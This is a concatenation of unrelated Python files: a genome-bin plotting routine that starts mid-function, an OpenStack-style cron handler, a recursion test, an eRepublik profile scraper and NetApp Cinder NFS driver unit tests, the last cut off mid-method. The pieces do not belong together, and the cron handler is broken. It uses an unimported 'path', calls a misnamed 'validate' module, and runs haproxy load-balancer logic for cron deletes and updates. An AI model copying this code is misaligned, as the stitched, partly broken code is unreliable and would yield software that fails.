    pd_counts = pd.DataFrame()
    pd_bins_copy = pd_bins[[utils_labels.TOOL, 'precision_bp', 'recall_bp']].copy().dropna(subset=['precision_bp'])
    pd_bins_copy['newcolumn'] = pd_bins_copy['recall_bp'] + 5 * (pd_bins_copy['precision_bp'] - 1)
    for tool in tools:
        pd_tool_bins = pd_bins_copy[pd_bins_copy[utils_labels.TOOL] == tool]
        x50 = pd_tool_bins[pd_tool_bins['newcolumn'] > .5].shape[0]
        x70 = pd_tool_bins[pd_tool_bins['newcolumn'] > .7].shape[0]
        x90 = pd_tool_bins[pd_tool_bins['newcolumn'] > .9].shape[0]
        x50 -= x70
        x70 -= x90
        pd_tool_counts = pd.DataFrame([[x90, x70, x50]], columns=['>90', '>70', '>50'], index=[tool])
        pd_counts = pd_counts.append(pd_tool_counts)
    return pd_counts


def plot_counts(pd_bins, tools, output_dir, output_file, get_bin_counts_function):
    pd_counts = get_bin_counts_function(tools, pd_bins)
    fig, axs = plt.subplots(figsize=(11, 5))
    if output_file == 'bin_counts':
        fig = pd_counts.plot.bar(ax=axs, stacked=False, color=['#28334AFF', '#FBDE44FF', '#F65058FF'], width=.8, legend=None).get_figure()
    else:
        fig = pd_counts.plot.bar(ax=axs, stacked=True, color=['#9B4A97FF', '#FC766AFF', '#F9A12EFF'], width=.8, legend=None).get_figure()

    axs.tick_params(axis='x', labelrotation=45, length=0)
    axs.set_xticklabels(tools, horizontalalignment='right', fontsize=14)
    axs.set_xlabel(None)

    # axs.yaxis.set_major_locator(MaxNLocator(integer=True))

    h, l = axs.get_legend_handles_labels()
    axs.set_ylabel('#genome bins', fontsize=14)

    # axs.grid(which='major', linestyle=':', linewidth='0.5')
    # axs.grid(which='minor', linestyle=':', linewidth='0.5')

    ph = [plt.plot([], marker='', ls='')[0]]
    handles = ph + h

    if output_file == 'bin_counts':
        labels = ['Contamination < 10%           Completeness  '] + l
        bbox_to_anchor = (0.49, 1.02)
    else:
        labels = ['Score  '] + l
        y_values = (pd_counts['>90'] + pd_counts['>70'] + pd_counts['>50']).tolist()
        for i, v in enumerate(y_values):
            axs.text(i - .25, v + 5, str(v), color='black', fontweight='bold')
        bbox_to_anchor = (0.47, 1.02)

    lgd = plt.legend(handles, labels, bbox_to_anchor=bbox_to_anchor, columnspacing=.5, loc=8, borderaxespad=0., handlelength=1, frameon=False, fontsize=14, ncol=5)

    # plt.subplots_adjust(hspace=0.6, wspace=0.2)

    fig.savefig(os.path.join(output_dir, 'genome', output_file + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, 'genome', output_file + '.png'), dpi=200, format='png', bbox_extra_artists=(lgd,), bbox_inches='tight')
    plt.close(fig)

import os
import datetime

from jinja2 import Environment,PackageLoader,TemplateNotFound
from hotzenplotz.openstack.common import cfg
from hotzenplotz.openstack.common import log as logging
from hotzenplotz.openstack.common import utils

from hotzenplotz.common import exception
from hotzenplotz.api import validator


LOG = logging.getLogger(__name__)

class CronHandler(object):

    """Handler Cron Resource
    """

    def __init__(self, **kwargs):
        env = Environment(loader=PackageLoader('hotzenplotz.worker','templates'))
        self.template =  env.get_template('cron')
        self.dir_path = None

   # @utils.synchronized('haproxy')
    def do_config(self, request):
        try:
            self._validate_request(request)
        except exception.BadRequest as e:
            LOG.warn('Bad request: %s' % e)
            raise exception.CronConfigureError(explanation=str(e))

        cmd = request['method']
        msg = request['cron_resource']

        if cmd == 'create_cron':
            try:
                self._create_cron(msg)
            except exception.CronCreateError as e:
                raise exception.CronConfigureError(explanation=str(e))

        elif cmd == 'delete_cron':
            try:
                self._delete_cron(msg)
            except exception.HaproxyDeleteError as e:
                raise exception.CronConfigureError(explanation=str(e))

        elif cmd == 'update_cron':
            try:
                self._update_cron(msg)
            except exception.CronUpdateError as e:
                raise exception.CronConfigureError(explanation=str(e))

    def _create_cron(self,msg,syntax_check=False):

        try:
            output = self.template.render(cron_resource=msg)
        except TemplateNotFound as e:
            raise TemplateNotFound(str(e))
        try:
            if not self.dir_path:
                self.dir_path = '/etc/puppet/modules/cron/'
            cron_name = msg['title']
            file_path = self.dir_path + cron_name 
            if not path.exists(file_path):
                 with open(file_path,'a') as f:
                    f.write(output)
        except exception.CronCreateError as e:
            raise exception.CronCreateError(explanation=str(e))
        if syntax_check:
            try:
                self._test_syntax(file_path)
            except exception.ProcessExecutionError as e:
                raise exception.CronCreateError(explanation=str(e))

        LOG.debug("Created the new cron successfully")

    def _delete_cron(self, msg):
        LOG.debug("Deleting cron  for NAME:%s USER: %s PROJECT:%s" %
                  (msg['id'], msg['user_id'], msg['project_id']))
        try:
            new_cfg_path = self._create_lb_deleted_haproxy_cfg(msg)
        except exception.HaproxyLBNotExists as e:
            LOG.warn('%s', e)
            return
            ##raise exception.HaproxyDeleteError(explanation=str(e))

        try:
            self._test_haproxy_config(new_cfg_path)
        except exception.ProcessExecutionError as e:
            raise exception.HaproxyDeleteError(explanation=str(e))

        rc, backup_path = self._backup_original_cfg()
        if rc != 0:
            raise exception.HaproxyDeleteError(explanation=backup_path)

        rc, strerror = self._replace_original_cfg_with_new(new_cfg_path)
        if rc != 0:
            raise exception.HaproxyDeleteError(explanation=strerror)

        if self._reload_haproxy_cfg(backup_path) != 0:
            e = 'Failed to reload haproxy'
            raise exception.HaproxyDeleteError(explanation=str(e))

        LOG.debug("Deleted the new load balancer successfully")

    def _update_cron(self, msg):
        LOG.debug("Updating the haproxy load "
                  "balancer for NAME:%s USER: %s PROJECT:%s" %
                  (msg['uuid'], msg['user_id'], msg['project_id']))

        try:
            lb_deleted_cfg_path = self._create_lb_deleted_haproxy_cfg(msg)
        except exception.HaproxyLBNotExists as e:
            LOG.warn('%s', e)
            raise exception.HaproxyUpdateError(explanation=str(e))

        try:
            new_cfg_path = self._create_lb_haproxy_cfg(
                msg, base_cfg_path=lb_deleted_cfg_path)
        except exception.HaproxyCreateCfgError as e:
            raise exception.HaproxyUpdateError(explanation=str(e))

        try:
            self._test_haproxy_config(new_cfg_path)
        except exception.ProcessExecutionError as e:
            raise exception.HaproxyUpdateError(explanation=str(e))

        LOG.debug("Updated the new load balancer successfully")

    def _validate_request(self, request):
        validate.check_tcp_request(request)

    def _get_lb_name(self, msg):
        # TODO(wenjianhn): utf-8 support, base64
        ##return "%s_%s" % (msg['project_id'],
        return "%s" % msg['uuid']



    def _is_lb_in_use(self, lb_name,
                      base_cfg_path='/etc/haproxy/haproxy.cfg'):
        with open(base_cfg_path) as cfg:
            lines = cfg.readlines()

        try:
            in_use_lb_name = [line.split()[1] for line in lines
                              if line.startswith('listen')]
        except IndexError:
            LOG.error("No item was found after listen directive,"
                      "is the haproxy configuraion file valid?")
            raise

        return lb_name in in_use_lb_name


    def _test_syntax(self, cfile_path):
        LOG.info('Testing the new puppet configuration file')
        cmd = "puppet parser validate %s" % cfile_path

        try:
            utils.execute(cmd)
        except exception.ProcessExecutionError as e:
            LOG.warn('Did not pass the configuration syntax test: %s', e)
            raise

    def _get_one_lb_info(self, line_all, line_index, line_total):
        value = []

        for i in range(line_index, line_total):
            line = line_all[i]

            if line.startswith('\t'):
                value.append(line)
            elif line.startswith('listen'):
                return i, value

        return line_total - 1, value


from must import MustHavePatterns
from successor import Successor


class TestSuccessor(object):
    @classmethod
    def setup_class(cls):
        cls.test_patterns = MustHavePatterns(Successor)

    def test_successor(self):
        try:
            self.test_patterns.create(Successor)
            raise Exception("Recursive structure did not explode.")
        except RuntimeError as re:
            assert str(re).startswith("maximum recursion depth")

#-*- encoding: utf-8 -*-

import csv, math, time, re, threading, sys

try:
    from urllib.request import urlopen
except ImportError:
    from urllib import urlopen

class ErAPI():
    # Metodo constructor, seteos basicos necesarios de configuracion, instancia objetos utiles
    def __init__(self):
        self.data = {}
        # Data format: {'XXCiro|BNC': {'id': 123456, 'nick': 'XXCiro', 'level': 49, 'strength': 532.5, 'rank_points': 1233354, 'citizenship': 'Argentina'}}
        
        # Diccionario de puntos/rango
        self.rank_required_points = {
            "Recruit": 0,
            "Private": 15,
            "Private*": 45,
            "Private**": 80,
            "Private***": 120,
            "Corporal": 170,
            "Corporal*": 250,
            "Corporal**": 350,
            "Corporal***": 450,
            "Sergeant": 600,
            "Sergeant*": 800,
            "Sergeant**": 1000,
            "Sergeant***": 1400,
            "Lieutenant": 1850,
            "Lieutenant*": 2350,
            "Lieutenant**": 3000,
            "Lieutenant***": 3750,
            "Captain": 5000,
            "Captain*": 6500,
            "Captain**": 9000,
            "Captain***": 12000,
            "Major": 15500,
            "Major*": 20000,
            "Major**": 25000,
            "Major***": 31000,
            "Commander": 40000,
            "Commander*": 52000,
            "Commander**": 67000,
            "Commander***": 85000,
            "Lt Colonel": 110000,
            "Lt Colonel*": 140000,
            "Lt Colonel**": 180000,
            "Lt Colonel***": 225000,
            "Colonel": 285000,
            "Colonel*": 355000,
            "Colonel**": 435000,
            "Colonel***": 540000,
            "General": 660000,
            "General*": 800000,
            "General**": 950000,
            "General***": 1140000,
            "Field Marshal": 1350000,
            "Field Marshal*": 1600000,
            "Field Marshal**": 1875000,
            "Field Marshal***": 2185000,
            "Supreme Marshal": 2550000,
            "Supreme Marshal*": 3000000,
            "Supreme Marshal**": 3500000,
            "Supreme Marshal***": 4150000,
            "National Force": 4900000,
            "National Force*": 5800000,
            "National Force**": 7000000,
            "National Force***": 9000000,
            "World Class Force": 11500000,
            "World Class Force*": 14500000,
            "World Class Force**": 18000000,
            "World Class Force***": 22000000,
            "Legendary Force": 26500000,
            "Legendary Force*": 31500000,
            "Legendary Force**": 37000000,
            "Legendary Force***": 42000000,
            "God of War": 50000000,
            "God of War*": 100000000 ,
            "God of War**": 200000000,
            "God of War***": 500000000,
            "Titan": 1000000000,
            "Titan*": 2000000000,
            "Titan**": 4000000000,
            "Titan***": 10000000000}

        # Lista ordenada de rangos segun importancia
        self.rank_to_pos = [
            "Recruit",
            "Private",
            "Private*",
            "Private**",
            "Private***",
            "Corporal",
            "Corporal*",
            "Corporal**",
            "Corporal***",
            "Sergeant",
            "Sergeant*",
            "Sergeant**",
            "Sergeant***",
            "Lieutenant",
            "Lieutenant*",
            "Lieutenant**",
            "Lieutenant***",
            "Captain",
            "Captain*",
            "Captain**",
            "Captain***",
            "Major",
            "Major*",
            "Major**",
            "Major***",
            "Commander",
            "Commander*",
            "Commander**",
            "Commander***",
            "Lt Colonel",
            "Lt Colonel*",
            "Lt Colonel**",
            "Lt Colonel***",
            "Colonel",
            "Colonel*",
            "Colonel**",
            "Colonel***",
            "General",
            "General*",
            "General**",
            "General***",
            "Field Marshal",
            "Field Marshal*",
            "Field Marshal**",
            "Field Marshal***",
            "Supreme Marshal",
            "Supreme Marshal*",
            "Supreme Marshal**",
            "Supreme Marshal***",
            "National Force",
            "National Force*",
            "National Force**",
            "National Force***",
            "World Class Force",
            "World Class Force*",
            "World Class Force**",
            "World Class Force***",
            "Legendary Force",
            "Legendary Force*",
            "Legendary Force**",
            "Legendary Force***",
            "God of War",
            "God of War*",
            "God of War**",
            "God of War***",
            "Titan",
            "Titan*",
            "Titan**",
            "Titan***",]

        # Bandera de ejecucion, util en caso de que se decida matar de forma manual los threads para actualizar y guardar los datos
        self.run = True

        # Se paraleliza la carga de datos en un hilo nuevo, el cual es demonio del invocador en caso de "muerte prematura"
        th = threading.Thread(target=self.data_loader)
        th.daemon = True
        th.start()

    # Metodo invocador, carga datos y crea threads para guardar y actualizar informacion, solo llamado desde constructor
    def data_loader(self):
        self.load_data()

        self.data_saver_th = threading.Thread(target=self.data_saver)
        self.data_saver_th.daemon = True
        self.data_saver_th.start()

        self.data_updater_th = threading.Thread(target=self.data_updater)
        self.data_updater_th.daemon = True
        self.data_updater_th.start()

    # Metodo para volcar informacion a archivo fisico, solo llamado de metodo data_loader
    def data_saver(self):
        while self.run:
            self.save_data()

            time.sleep(60)

    # Metodo para actualizar informacion, solo llamado de metodo data_loader
    def data_updater(self):
        while self.run:
            for irc_nick in self.data:
                self.update_data(irc_nick)
                time.sleep(30)

            time.sleep(600)

    # ---------------------------------------------------------------------------------- #
    # @ PUBLIC METHODS                                                                   #
    # ---------------------------------------------------------------------------------- #

    # Metodo para actualizar informacion local del objeto desde archivo
    def load_data(self):
        try:
            f = open('data/er_nick-data.csv', 'rt')
            reader = csv.reader(f)
            for nick_irc,id,nick_er,level,strength,rank_points,citizenship in reader:
                self.data[nick_irc] = {'id': int(id), 'nick': nick_er, 'level': int(level), 'strength': float(strength), 'rank_points': int(rank_points), 'citizenship': citizenship}
            f.close()
        except:
            pass

    # Metodo para guardar informacion local del objeto en archivo
    def save_data(self):
        try:
            f = open('data/er_nick-data.csv', 'wt')
            writer = csv.writer(f)
            for u in self.data:
                writer.writerow([u, self.data[u]['id'], self.data[u]['nick'], self.data[u]['level'], self.data[u]['strength'], self.data[u]['rank_points'], self.data[u]['citizenship']])
            f.close()
        except:
            pass

    # Metodo scraper para actualizar informacion local del objeto del nick de irc especificado
    def update_data(self, irc_nick):
        try:
            id = self.data[irc_nick]['id']

            c = urlopen('http://www.erepublik.com/es/citizen/profile/%d' % id)
            page = c.read()
            c.close()

            self.data[irc_nick]['nick'] = re.search('<meta name="title" content="(.+?) - Ciudadano del Nuevo Mundo" \/>', page.decode('utf-8')).group(1)
            self.data[irc_nick]['level'] = int(re.search('<strong class="citizen_level">(.+?)<\/strong>', page.decode('utf-8'), re.DOTALL).group(1))
            self.data[irc_nick]['strength'] = float(re.search('<span class="military_box_info mb_bottom">(.+?)</span>', page.decode('utf-8'), re.DOTALL).group(1).strip('\r\n\t ').replace(',',''))
            self.data[irc_nick]['rank_points'] = int(re.search('<span class="rank_numbers">(.+?) \/', page.decode('utf-8'), re.DOTALL).group(1).replace(',',''))
            self.data[irc_nick]['citizenship'] = re.search('<a href="http\:\/\/www.erepublik.com\/es\/country\/society\/([^ \t\n\x0B\f\r]+?)">', page.decode('utf-8')).group(1)
        except:
            pass

    # Metodo para actualizar informacion local del objeto con nick de irc e id especificados, fuerza actualizacion del mismo
    def reg_nick_write(self, nick, id):
        if(nick.lower() in self.data.keys()):
            self.data[nick.lower()]['id'] = int(id)
        else:
            self.data[nick.lower()] = {'id': int(id), 'nick': nick, 'level': 1, 'strength': 0, 'rank_points': 0, 'citizenship': ''}

        self.update_data(nick.lower())        

    # Metodo para obtener ID del nick de irc especificado
    def get_id(self, nick):
        return self.data[nick.lower()]['id']

    # Metodo para obtener LEVEL del nick de irc especificado
    def get_level(self, nick):
        return self.data[nick.lower()]['level']

    # Metodo para obtener STRENGTH del nick de irc especificado
    def get_strength(self, nick):
        return self.data[nick.lower()]['strength']

    # Metodo para obtener RANK POINTS del nick de irc especificado
    def get_rank_points(self, nick):
        return self.data[nick.lower()]['rank_points']

    # Metodo para obtener CITIZENSHIP del nick de irc especificado
    def get_citizenship(self, nick):
        return self.data[nick.lower()]['citizenship']

    # Metodo para obtener NICK INGAME del nick de irc especificado
    def get_nick(self, nick):
        return self.data[nick.lower()]['nick']

    # Metodo para obtener RANK NAME del nick de irc especificado
    def calculate_rank_name(self, rank_points):
        index = 0

        for k in [key for key in self.rank_required_points.keys() if self.rank_required_points[key] < rank_points]:
            if(self.rank_to_pos.index(k) > index):
                index = self.rank_to_pos.index(k)

        return self.rank_to_pos[index]

    # Metodo para calcular DAÑO del nick de irc especificado segun datos adicionales
    def calculate_damage(self, rank_points, strength, weapon_power, level, bonus):
        index = 0

        for k in [key for key in self.rank_required_points.keys() if self.rank_required_points[key] < rank_points]:
            if(self.rank_to_pos.index(k) > index):
                index = self.rank_to_pos.index(k)

        return(math.trunc(((index / 20) + 0.3) * ((strength / 10) + 40) * (1 + (weapon_power / 100)) * (1.1 if level > 99 else 1) * bonus))

# Copyright (c) 2012 NetApp, Inc.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
"""Unit tests for the NetApp-specific NFS driver module."""

from lxml import etree
import mock
import mox
from mox import IgnoreArg
from mox import IsA
import os

from cinder import context
from cinder import exception
from cinder.image import image_utils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.netapp import api
from cinder.volume.drivers.netapp import nfs as netapp_nfs
from cinder.volume.drivers.netapp import utils


from oslo.config import cfg
CONF = cfg.CONF

LOG = logging.getLogger(__name__)


def create_configuration():
    configuration = mox.MockObject(conf.Configuration)
    configuration.append_config_values(mox.IgnoreArg())
    configuration.nfs_mount_point_base = '/mnt/test'
    configuration.nfs_mount_options = None
    return configuration


class FakeVolume(object):
    def __init__(self, size=0):
        self.size = size
        self.id = hash(self)
        self.name = None

    def __getitem__(self, key):
        return self.__dict__[key]

    def __setitem__(self, key, val):
        self.__dict__[key] = val


class FakeSnapshot(object):
    def __init__(self, volume_size=0):
        self.volume_name = None
        self.name = None
        self.volume_id = None
        self.volume_size = volume_size
        self.user_id = None
        self.status = None

    def __getitem__(self, key):
        return self.__dict__[key]


class FakeResponse(object):
    def __init__(self, status):
        """Initialize FakeResponse.

        :param status: Either 'failed' or 'passed'
        """
        self.Status = status

        if status == 'failed':
            self.Reason = 'Sample error'


class NetappDirectCmodeNfsDriverTestCase(test.TestCase):
    """Test direct NetApp C Mode driver."""
    def setUp(self):
        super(NetappDirectCmodeNfsDriverTestCase, self).setUp()
        self._custom_setup()

    def test_create_snapshot(self):
        """Test snapshot can be created and deleted."""
        mox = self.mox
        drv = self._driver

        mox.StubOutWithMock(drv, '_clone_volume')
        drv._clone_volume(IgnoreArg(), IgnoreArg(), IgnoreArg())
        mox.ReplayAll()

        drv.create_snapshot(FakeSnapshot())

        mox.VerifyAll()

    def test_create_volume_from_snapshot(self):
        """Tests volume creation from snapshot."""
        drv = self._driver
        mox = self.mox
        volume = FakeVolume(1)
        snapshot = FakeSnapshot(1)

        location = '127.0.0.1:/nfs'
        expected_result = {'provider_location': location}
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_get_volume_location')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        drv._clone_volume(IgnoreArg(), IgnoreArg(), IgnoreArg())
        drv._get_volume_location(IgnoreArg()).AndReturn(location)
        drv.local_path(IgnoreArg()).AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all(IgnoreArg())

        mox.ReplayAll()

        loc = drv.create_volume_from_snapshot(volume, snapshot)

        self.assertEqual(loc, expected_result)

        mox.VerifyAll()

    def _prepare_delete_snapshot_mock(self, snapshot_exists):
        drv = self._driver
        mox = self.mox

        mox.StubOutWithMock(drv, '_get_provider_location')
        mox.StubOutWithMock(drv, '_volume_not_present')
        mox.StubOutWithMock(drv, '_post_prov_deprov_in_ssc')

        if snapshot_exists:
            mox.StubOutWithMock(drv, '_execute')
            mox.StubOutWithMock(drv, '_get_volume_path')
        drv._get_provider_location(IgnoreArg())
        drv._get_provider_location(IgnoreArg())
        drv._volume_not_present(IgnoreArg(), IgnoreArg())\
            .AndReturn(not snapshot_exists)

        if snapshot_exists:
            drv._get_volume_path(IgnoreArg(), IgnoreArg())
            drv._execute('rm', None, run_as_root=True)

        drv._post_prov_deprov_in_ssc(IgnoreArg())

        mox.ReplayAll()

        return mox

    def test_delete_existing_snapshot(self):
        drv = self._driver
        mox = self._prepare_delete_snapshot_mock(True)

        drv.delete_snapshot(FakeSnapshot())

        mox.VerifyAll()

    def test_delete_missing_snapshot(self):
        drv = self._driver
        mox = self._prepare_delete_snapshot_mock(False)

        drv.delete_snapshot(FakeSnapshot())

        mox.VerifyAll()

    def _custom_setup(self):
        kwargs = {}
        kwargs['netapp_mode'] = 'proxy'
        kwargs['configuration'] = create_configuration()
        self._driver = netapp_nfs.NetAppDirectCmodeNfsDriver(**kwargs)

    def test_check_for_setup_error(self):
        mox = self.mox
        drv = self._driver
        required_flags = [
            'netapp_transport_type',
            'netapp_login',
            'netapp_password',
            'netapp_server_hostname',
            'netapp_server_port']

        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, None)
        # check exception raises when flags are not set
        self.assertRaises(exception.CinderException,
                          drv.check_for_setup_error)

        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, 'val')
        setattr(drv, 'ssc_enabled', False)

        mox.StubOutWithMock(netapp_nfs.NetAppDirectNfsDriver, '_check_flags')

        netapp_nfs.NetAppDirectNfsDriver._check_flags()
        mox.ReplayAll()

        drv.check_for_setup_error()

        mox.VerifyAll()

        # restore initial FLAGS
        for flag in required_flags:
            delattr(drv.configuration, flag)

    def test_do_setup(self):
        mox = self.mox
        drv = self._driver

        mox.StubOutWithMock(netapp_nfs.NetAppNFSDriver, 'do_setup')
        mox.StubOutWithMock(drv, '_get_client')
        mox.StubOutWithMock(drv, '_do_custom_setup')

        netapp_nfs.NetAppNFSDriver.do_setup(IgnoreArg())
        drv._get_client()
        drv._do_custom_setup(IgnoreArg())

        mox.ReplayAll()

        drv.do_setup(IsA(context.RequestContext))

        mox.VerifyAll()

    def _prepare_clone_mock(self, status):
        drv = self._driver
        mox = self.mox

        volume = FakeVolume()
        setattr(volume, 'provider_location', '127.0.0.1:/nfs')

        mox.StubOutWithMock(drv, '_get_host_ip')
        mox.StubOutWithMock(drv, '_get_export_path')
        mox.StubOutWithMock(drv, '_get_if_info_by_ip')
        mox.StubOutWithMock(drv, '_get_vol_by_junc_vserver')
        mox.StubOutWithMock(drv, '_clone_file')
        mox.StubOutWithMock(drv, '_post_prov_deprov_in_ssc')

        drv._get_host_ip(IgnoreArg()).AndReturn('127.0.0.1')
        drv._get_export_path(IgnoreArg()).AndReturn('/nfs')
        drv._get_if_info_by_ip('127.0.0.1').AndReturn(
            self._prepare_info_by_ip_response())
        drv._get_vol_by_junc_vserver('openstack', '/nfs').AndReturn('nfsvol')
        drv._clone_file('nfsvol', 'volume_name', 'clone_name',
                        'openstack')
        drv._post_prov_deprov_in_ssc(IgnoreArg())
        return mox

    def _prepare_info_by_ip_response(self):
        res = """<attributes-list>
        <net-interface-info>
        <address>127.0.0.1</address>
        <administrative-status>up</administrative-status>
        <current-node>fas3170rre-cmode-01</current-node>
        <current-port>e1b-1165</current-port>
        <data-protocols>
          <data-protocol>nfs</data-protocol>
        </data-protocols>
        <dns-domain-name>none</dns-domain-name>
        <failover-group/>
        <failover-policy>disabled</failover-policy>
        <firewall-policy>data</firewall-policy>
        <home-node>fas3170rre-cmode-01</home-node>
        <home-port>e1b-1165</home-port>
        <interface-name>nfs_data1</interface-name>
        <is-auto-revert>false</is-auto-revert>
        <is-home>true</is-home>
        <netmask>255.255.255.0</netmask>
        <netmask-length>24</netmask-length>
        <operational-status>up</operational-status>
        <role>data</role>
        <routing-group-name>c10.63.165.0/24</routing-group-name>
        <use-failover-group>disabled</use-failover-group>
        <vserver>openstack</vserver>
      </net-interface-info></attributes-list>"""
        response_el = etree.XML(res)
        return api.NaElement(response_el).get_children()

    def test_clone_volume(self):
        drv = self._driver
        mox = self._prepare_clone_mock('pass')

        mox.ReplayAll()

        volume_name = 'volume_name'
        clone_name = 'clone_name'
        volume_id = volume_name + str(hash(volume_name))
        share = 'ip:/share'

        drv._clone_volume(volume_name, clone_name, volume_id, share)

        mox.VerifyAll()

    def test_register_img_in_cache_noshare(self):
        volume = {'id': '1', 'name': 'testvol'}
        volume['provider_location'] = '10.61.170.1:/share/path'
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')

        drv._do_clone_rel_img_cache('testvol', 'img-cache-12345',
                                    '10.61.170.1:/share/path',
                                    'img-cache-12345')

        mox.ReplayAll()
        drv._register_image_in_cache(volume, '12345')
        mox.VerifyAll()

    def test_register_img_in_cache_with_share(self):
        volume = {'id': '1', 'name': 'testvol'}
        volume['provider_location'] = '10.61.170.1:/share/path'
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')

        drv._do_clone_rel_img_cache('testvol', 'img-cache-12345',
                                    '10.61.170.1:/share/path',
                                    'img-cache-12345')

        mox.ReplayAll()
        drv._register_image_in_cache(volume, '12345')
        mox.VerifyAll()

    def test_find_image_in_cache_no_shares(self):
        drv = self._driver
        drv._mounted_shares = []
        result = drv._find_image_in_cache('image_id')
        if not result:
            pass
        else:
            self.fail('Return result is unexpected')

    def test_find_image_in_cache_shares(self):
        drv = self._driver
        mox = self.mox
        drv._mounted_shares = ['testshare']
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(os.path, 'exists')

        drv._get_mount_point_for_share('testshare').AndReturn('/mnt')
        os.path.exists('/mnt/img-cache-id').AndReturn(True)
        mox.ReplayAll()
        result = drv._find_image_in_cache('id')
        (share, file_name) = result[0]
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')

        if (share == 'testshare' and file_name == 'img-cache-id'):
            pass
        else:
            LOG.warn(_("Share %(share)s and file name %(file_name)s")
                     % {'share': share, 'file_name': file_name})
            self.fail('Return result is unexpected')

    def test_find_old_cache_files_notexists(self):
        drv = self._driver
        mox = self.mox
        cmd = ['find', '/mnt', '-maxdepth', '1', '-name',
               'img-cache*', '-amin', '+720']
        setattr(drv.configuration, 'expiry_thres_minutes', 720)
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_execute')

        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._execute(*cmd, run_as_root=True).AndReturn((None, ''))
        mox.ReplayAll()
        res = drv._find_old_cache_files('share')
        mox.VerifyAll()
        if len(res) == 0:
            pass
        else:
            self.fail('No files expected but got return values.')

    def test_find_old_cache_files_exists(self):
        drv = self._driver
        mox = self.mox
        cmd = ['find', '/mnt', '-maxdepth', '1', '-name',
               'img-cache*', '-amin', '+720']
        setattr(drv.configuration, 'expiry_thres_minutes', '720')
        files = '/mnt/img-id1\n/mnt/img-id2\n'
        r_files = ['img-id1', 'img-id2']
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_execute')
        mox.StubOutWithMock(drv, '_shortlist_del_eligible_files')

        drv._get_mount_point_for_share('share').AndReturn('/mnt')
        drv._execute(*cmd, run_as_root=True).AndReturn((files, None))
        drv._shortlist_del_eligible_files(
            IgnoreArg(), r_files).AndReturn(r_files)
        mox.ReplayAll()
        res = drv._find_old_cache_files('share')
        mox.VerifyAll()
        if len(res) == len(r_files):
            for f in res:
                r_files.remove(f)
        else:
            self.fail('Returned files not same as expected.')

    def test_delete_files_till_bytes_free_success(self):
        drv = self._driver
        mox = self.mox
        files = [('img-cache-1', 230), ('img-cache-2', 380)]
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_delete_file')

        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._delete_file('/mnt/img-cache-2').AndReturn(True)
        drv._delete_file('/mnt/img-cache-1').AndReturn(True)
        mox.ReplayAll()
        drv._delete_files_till_bytes_free(files, 'share', bytes_to_free=1024)
        mox.VerifyAll()

    def test_clean_image_cache_exec(self):
        drv = self._driver
        mox = self.mox
        drv.configuration.thres_avl_size_perc_start = 20
        drv.configuration.thres_avl_size_perc_stop = 50
        drv._mounted_shares = ['testshare']

        mox.StubOutWithMock(drv, '_find_old_cache_files')
        mox.StubOutWithMock(drv, '_delete_files_till_bytes_free')
        mox.StubOutWithMock(drv, '_get_capacity_info')

        drv._get_capacity_info('testshare').AndReturn((100, 19, 81))
        drv._find_old_cache_files('testshare').AndReturn(['f1', 'f2'])
        drv._delete_files_till_bytes_free(
            ['f1', 'f2'], 'testshare', bytes_to_free=31)
        mox.ReplayAll()
        drv._clean_image_cache()
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')
        if not drv.cleaning:
            pass
        else:
            self.fail('Clean image cache failed.')

    def test_clean_image_cache_noexec(self):
        drv = self._driver
        mox = self.mox
        drv.configuration.thres_avl_size_perc_start = 20
        drv.configuration.thres_avl_size_perc_stop = 50
        drv._mounted_shares = ['testshare']

        mox.StubOutWithMock(drv, '_get_capacity_info')

        drv._get_capacity_info('testshare').AndReturn((100, 30, 70))
        mox.ReplayAll()
        drv._clean_image_cache()
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')
        if not drv.cleaning:
            pass
        else:
            self.fail('Clean image cache failed.')

    def test_clone_image_fromcache(self):
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')
        mox.StubOutWithMock(drv, '_post_clone_image')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')

        drv._find_image_in_cache(IgnoreArg()).AndReturn(
            [('share', 'file_name')])
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._do_clone_rel_img_cache('file_name', 'vol', 'share', 'file_name')
        drv._post_clone_image(volume)

        mox.ReplayAll()
        drv.clone_image(volume, ('image_location', None), 'image_id', {})
        mox.VerifyAll()

    def get_img_info(self, format):
        class img_info(object):
            def __init__(self, fmt):
                self.file_format = fmt

        return img_info(format)

    def test_clone_image_cloneableshare_nospace(self):
        drv = self._driver
        mox = self.mox
